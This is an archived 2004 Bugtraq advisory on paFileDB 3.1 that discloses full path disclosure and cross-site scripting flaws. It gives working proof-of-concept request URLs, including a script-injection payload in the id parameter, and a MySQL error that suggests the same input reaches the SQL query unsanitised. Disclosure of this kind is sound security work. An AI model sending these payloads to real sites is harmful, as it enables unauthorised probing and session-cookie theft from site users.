lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY8-F62yiqLQxDqoN100001c77@hotmail.com>
Date: Tue, 27 Apr 2004 21:41:04 +0200
From: "k1LL3r B0y" <k1ll3rb0y@...mail.com>
To: bugtraq@...urityfocus.com, info@...uriteam.com,
	submissions@...ketstormsecurity.org,
	full-disclosure-admin@...ts.netsys.com
Subject: Multiple vulnerabilities paFileDB


Advisory: http://bichosoft.webcindario.com/advisory-04.txt


#########################################################################
###################### :.: DarkBicho :.: ################################
#								  	#
#   PROGRAM: paFileDB							#
#   VERSION: 3.1							#
#   URL: http://www.phparena.net					#
#   BUG: Multiple vulnerabilities					#
#   DATE: 27/04/2004							#
#   AUTHOR: DarkBicho							#
#           WebSite: http://www.darkbicho.tk				#
#           Email: darkbicho@...u.com					#
#           Team: Security Wari Projects <www.swp-zone.org>		#
#									#
#########################################################################
#########################################################################



1.- Vulnerabilities:
    ---------------


A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.

http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

and we get standard error messages, revealing the full path to the nuke 
engine scripting files:

Fatal error: Call to undefined function: locbar() in 
/home/site/includes/admin/login.php
on line 12

http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php

2. Cross-Site Scripting aka XSS:
   ----------------------------


  Cross-Site Scripting in id variable:


  
http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>


paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near 
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE 
cat_id = '''


3.- SOLUTION:
     ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
    Check the Video Gallery website for updates and official release 
details.


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "El pisto es y sera peruano"

5.- Contact
    -------

	WEB: http://www.darkbicho.tk
	EMAIL: darkbicho@...u.com


---------------------------------- [ EOF ] 
------------------------------------

_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ